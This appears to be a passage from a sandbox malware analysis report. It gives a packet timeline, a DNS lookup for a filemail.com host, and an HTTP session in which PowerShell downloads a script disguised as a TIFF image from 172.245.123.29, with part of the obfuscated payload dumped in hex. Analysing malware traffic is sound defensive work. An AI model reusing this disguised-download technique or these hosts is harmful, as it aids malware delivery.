                                                                      Nov 28, 2024 18:50:24.517592907 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.525846958 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.525898933 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.525902987 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.525942087 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.534306049 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.534363031 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.534370899 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.534416914 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.542769909 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.542818069 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.542834044 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.542892933 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.587101936 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.587244987 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.653247118 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.653310061 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.653561115 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.653561115 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.654395103 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.654468060 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.654568911 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.658915043 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.658993006 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.659063101 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.659197092 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.663366079 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.663453102 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.663460016 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.663506985 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.667654037 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.667716026 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.667726040 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.667772055 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.672036886 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.672091961 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.672215939 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.672388077 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.676438093 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.676521063 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.676528931 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.676579952 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.680854082 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.680915117 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.680959940 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.681026936 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.685246944 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.685301065 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.685348988 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.685399055 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.689752102 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.689829111 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.689901114 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.689949036 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.694376945 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.694437981 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.694530010 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.694582939 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.698457956 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.698508978 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.698606968 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.698657036 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.702882051 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.702949047 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.702959061 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.703000069 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.707253933 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.707331896 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.707346916 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.707391024 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.711688042 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.711745024 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.711746931 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.711790085 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.716114044 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.716187000 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.716187954 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.716231108 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.719919920 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.719990969 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.720017910 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.720057964 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.723716021 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.723777056 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.723834038 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.723885059 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.727669954 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.727746964 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.727755070 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.727799892 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.731487989 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.731549025 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.731585026 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.731637955 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.735297918 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.735364914 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.735377073 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.735421896 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.773658991 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.773689985 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.774066925 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.775509119 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.775577068 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.775590897 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.775643110 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.845765114 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.845782995 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.846019030 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.847306013 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.847378969 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.847435951 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.847490072 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.851164103 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.851233959 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.851510048 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.851583958 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.855019093 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.855098009 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.855099916 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.855144978 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.858865023 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.858925104 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.859065056 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.859117031 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.862659931 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.862720013 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.862763882 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.862809896 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.866480112 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.866543055 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.866565943 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.866612911 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.870261908 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.870318890 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.870388031 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.870433092 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.874145985 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.874208927 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.874253035 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.874305964 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.877964020 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.878026962 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.878087044 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.878139019 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.881817102 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.881876945 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.881934881 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.881988049 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.885663986 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.885737896 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.885823011 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.885868073 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.889473915 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.889532089 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.889585018 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.889636993 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.893268108 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.893345118 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.893419981 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.893465042 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.897108078 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.897171021 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.897192955 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.897237062 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.900922060 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.900970936 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.900991917 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.901025057 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.904840946 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.904907942 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.904918909 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.904961109 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.906734943 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.906793118 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.906838894 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.906882048 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.908721924 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.908782959 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.908829927 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.908874989 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.910687923 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.910744905 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.910785913 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.910840034 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.912623882 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.912687063 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.912731886 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.912794113 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.914592028 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.914660931 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.914663076 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.914704084 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.916601896 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.916656017 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.916692972 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.916734934 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.918513060 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.918560982 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.918672085 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.918720007 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.920428038 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.920492887 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.920531034 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.920579910 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.922401905 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.922457933 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.922492027 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.922538996 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.924361944 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.924417973 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.924537897 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.924582958 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.926306963 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.926361084 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.926418066 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.926464081 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:29.271368980 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:29.271466017 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:30.697180033 CET49731443192.168.2.4193.30.119.205
                                                                      Nov 28, 2024 18:50:30.697231054 CET44349731193.30.119.205192.168.2.4
                                                                      Nov 28, 2024 18:50:30.697355986 CET49731443192.168.2.4193.30.119.205
                                                                      Nov 28, 2024 18:50:30.707287073 CET49731443192.168.2.4193.30.119.205
                                                                      Nov 28, 2024 18:50:30.707298040 CET44349731193.30.119.205192.168.2.4
                                                                      Nov 28, 2024 18:50:31.286358118 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:32.562017918 CET44349731193.30.119.205192.168.2.4
                                                                      Nov 28, 2024 18:50:32.562139988 CET49731443192.168.2.4193.30.119.205
                                                                      Nov 28, 2024 18:50:32.565567970 CET49731443192.168.2.4193.30.119.205
                                                                      Nov 28, 2024 18:50:32.565581083 CET44349731193.30.119.205192.168.2.4
                                                                      Nov 28, 2024 18:50:32.565819025 CET44349731193.30.119.205192.168.2.4
                                                                      Nov 28, 2024 18:50:32.584625006 CET49731443192.168.2.4193.30.119.205
                                                                      Nov 28, 2024 18:50:32.631333113 CET44349731193.30.119.205192.168.2.4
                                                                      Nov 28, 2024 18:50:33.004946947 CET44349731193.30.119.205192.168.2.4
                                                                      Nov 28, 2024 18:50:33.005311012 CET44349731193.30.119.205192.168.2.4
                                                                      Nov 28, 2024 18:50:33.005377054 CET49731443192.168.2.4193.30.119.205
                                                                      Nov 28, 2024 18:50:33.011334896 CET49731443192.168.2.4193.30.119.205
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 28, 2024 18:50:30.273803949 CET6144353192.168.2.41.1.1.1
                                                                      Nov 28, 2024 18:50:30.690911055 CET53614431.1.1.1192.168.2.4
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 28, 2024 18:50:30.273803949 CET192.168.2.41.1.1.10xd0f1Standard query (0)3105.filemail.comA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 28, 2024 18:50:30.690911055 CET1.1.1.1192.168.2.40xd0f1No error (0)3105.filemail.comip.3105.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 28, 2024 18:50:30.690911055 CET1.1.1.1192.168.2.40xd0f1No error (0)ip.3105.filemail.com193.30.119.205A (IP address)IN (0x0001)false
                                                                      • 3105.filemail.com
                                                                      • 172.245.123.29
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449730172.245.123.29807452C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 18:50:23.161623955 CET335OUTGET /1343/seemebestthingswithentirethingswithgreatnaturethings.tIF HTTP/1.1
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                      Host: 172.245.123.29
                                                                      Connection: Keep-Alive
                                                                      Nov 28, 2024 18:50:24.269381046 CET1236INHTTP/1.1 200 OK
                                                                      Date: Thu, 28 Nov 2024 17:50:23 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                      Last-Modified: Wed, 27 Nov 2024 06:47:30 GMT
                                                                      ETag: "28a2e-627df56f0eef7"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 166446
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: image/tiff
                                                                      Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 4b 00 4c 00 63 00 76 00 4b 00 57 00 5a 00 4c 00 4c 00 42 00 47 00 42 00 67 00 69 00 4c 00 20 00 3d 00 20 00 22 00 4b 00 57 00 74 00 72 00 69 00 63 00 6c 00 69 00 6e 00 69 00 61 00 72 00 63 00 68 00 61 00 4c 00 6a 00 78 00 6d 00 71 00 41 00 63 00 41 00 55 00 61 00 72 00 22 00 0d 00 0a 00 67 00 62 00 68 00 78 00 47 00 50 00 70 00 4b 00 6d 00 55 00 6f 00 62 00 57 00 51 00 70 00 20 00 3d 00 20 00 22 00 63 00 63 00 57 00 62 00 4e 00 57 00 6b 00 4f 00 6b 00 69 00 4c 00 55 00 69 00 48 00 41 00 22 00 0d 00 0a 00 53 00 41 00 4b 00 4e 00 74 00 6e 00 65 00 6b 00 41 00 50 00 55 00 57 00 4c 00 7a 00 7a 00 20 00 3d 00 20 00 22 00 62 00 57 00 4b 00 69 00 42 00 4b 00 68 00 48 00 47 00 65 00 64 00 64 00 43 00 4b 00 62 00 22 00 0d 00 0a 00 6d 00 57 00 61 00 4a 00 61 00 6d 00 6f 00 50 00 70 00 76 00 5a 00 68 00 4e 00 69 00 6b 00 20 00 3d 00 20 00 22 00 7a 00 6f 00 53 00 41 00 4b 00 6e 00 64 00 4f 00 65 00 57 00 71 00 47 00 4f 00 4c 00 63 00 22 00 0d 00 0a 00 4b 00 43 00 49 00 4c 00 61 00 [TRUNCATED]
                                                                      Data Ascii: KLcvKWZLLBGBgiL = "KWtricliniarchaLjxmqAcAUar"gbhxGPpKmUobWQp = "ccWbNWkOkiLUiHA"SAKNtnekAPUWLzz = "bWKiBKhHGeddCKb"mWaJamoPpvZhNik = "zoSAKndOeWqGOLc"KCILabRxPJWtGug = "SHfgJRLecZPciri"KcbLxLpacthuWbZ = "IphWpmhgGBdKJqB"LdGWAahkcPLLkWP = "ALKfWbzcKGmOJmW"cKiQWWnvILlLWCu = "WZmGqqLtiLZRKJc"tpcWPnPWGHPdOmK = "oRRCNWeUeLzLvpO"sUAlHkxLgGKkocu = "kimAjIiexLqPlxu"ZlLAiKTpcRKLIKi = "KgWhpdBaKKLhKCu"omLLmLCjzULzLBA = "WmuWvBWgLzhOhcL
                                                                      Nov 28, 2024 18:50:24.269402027 CET1236INData Raw: 00 22 00 0d 00 0a 00 6a 00 63 00 71 00 53 00 57 00 63 00 4f 00 5a 00 57 00 70 00 4e 00 41 00 69 00 75 00 74 00 20 00 3d 00 20 00 22 00 64 00 7a 00 47 00 68 00 4c 00 5a 00 68 00 4c 00 41 00 4a 00 6b 00 57 00 4e 00 68 00 57 00 22 00 0d 00 0a 00 61
                                                                      Data Ascii: "jcqSWcOZWpNAiut = "dzGhLZhLAJkWNhW"adUefNkWkWoNKLx = "zCrczvLBbkcpine"KcGKLqdZeIGOLWb = "LLLrUzKWrWiJkWk"oGLKLRp
                                                                      Nov 28, 2024 18:50:24.269412994 CET1236INData Raw: 00 42 00 63 00 47 00 6c 00 57 00 4a 00 71 00 4b 00 6d 00 52 00 61 00 66 00 61 00 22 00 0d 00 0a 00 6c 00 6d 00 57 00 6c 00 4b 00 57 00 62 00 76 00 67 00 71 00 74 00 61 00 6b 00 4c 00 70 00 20 00 3d 00 20 00 22 00 7a 00 57 00 4b 00 4e 00 65 00 4f
                                                                      Data Ascii: BcGlWJqKmRafa"lmWlKWbvgqtakLp = "zWKNeOvzffktSkA"UnKdrRtricliniarchaQeicWJB = "RbZHWWUABIWCLZA"LZkbuoPpmbKeGQq =
                                                                      Nov 28, 2024 18:50:24.269432068 CET1236INData Raw: 00 6d 00 65 00 22 00 0d 00 0a 00 5a 00 4c 00 5a 00 47 00 63 00 4c 00 71 00 54 00 6b 00 7a 00 43 00 5a 00 70 00 4e 00 48 00 20 00 3d 00 20 00 22 00 63 00 42 00 62 00 72 00 41 00 4b 00 67 00 6e 00 65 00 69 00 57 00 5a 00 6c 00 41 00 47 00 22 00 0d
                                                                      Data Ascii: me"ZLZGcLqTkzCZpNH = "cBbrAKgneiWZlAG"cLAopLPHzgfkqWc = "mLzLskkuopckQmn"doNlNkZhWZLpQLh = "OczTNApKihWhKod"KPcIR
                                                                      Nov 28, 2024 18:50:24.269443035 CET1236INData Raw: 00 47 00 47 00 70 00 55 00 55 00 6d 00 54 00 6e 00 61 00 20 00 3d 00 20 00 22 00 57 00 50 00 7a 00 75 00 7a 00 71 00 62 00 73 00 4b 00 63 00 4c 00 7a 00 57 00 4c 00 75 00 22 00 0d 00 0a 00 57 00 63 00 61 00 50 00 71 00 50 00 64 00 68 00 50 00 65
                                                                      Data Ascii: GGpUUmTna = "WPzuzqbsKcLzWLu"WcaPqPdhPeWcxKt = "iuKUicLUAeOUQiW"xRximWiudRUeWzO = "ihBGbKGLkLvoriz"RiiLRbWtntriclin
                                                                      Nov 28, 2024 18:50:24.269573927 CET1236INData Raw: 00 6c 00 57 00 6d 00 6e 00 42 00 76 00 42 00 20 00 3d 00 20 00 22 00 6c 00 4c 00 57 00 42 00 72 00 7a 00 57 00 68 00 68 00 47 00 6b 00 70 00 52 00 63 00 4a 00 22 00 0d 00 0a 00 6e 00 6f 00 4c 00 5a 00 4b 00 41 00 7a 00 55 00 5a 00 50 00 6f 00 57
                                                                      Data Ascii: lWmnBvB = "lLWBrzWhhGkpRcJ"noLZKAzUZPoWZLW = "WtoBmUGWaqbeLRB"KpLeOWgtWcKKiip = "OxiPKzkkmCCWWWh"ZLocNBKfOKLUWPL
                                                                      Nov 28, 2024 18:50:24.269587040 CET776INData Raw: 00 4c 00 70 00 4f 00 6f 00 63 00 47 00 57 00 6a 00 42 00 71 00 4f 00 63 00 66 00 6d 00 50 00 22 00 0d 00 0a 00 48 00 6e 00 4f 00 57 00 4c 00 4c 00 69 00 43 00 6c 00 66 00 49 00 57 00 4b 00 6d 00 66 00 20 00 3d 00 20 00 22 00 41 00 47 00 52 00 4b
                                                                      Data Ascii: LpOocGWjBqOcfmP"HnOWLLiClfIWKmf = "AGRKZAGmKPZmWpZ"aKQcaLtbIZKcWbq = "iSILAmUUacldWbR"hCPqIKqKRUkUhmk = "OCKkLGLiPi
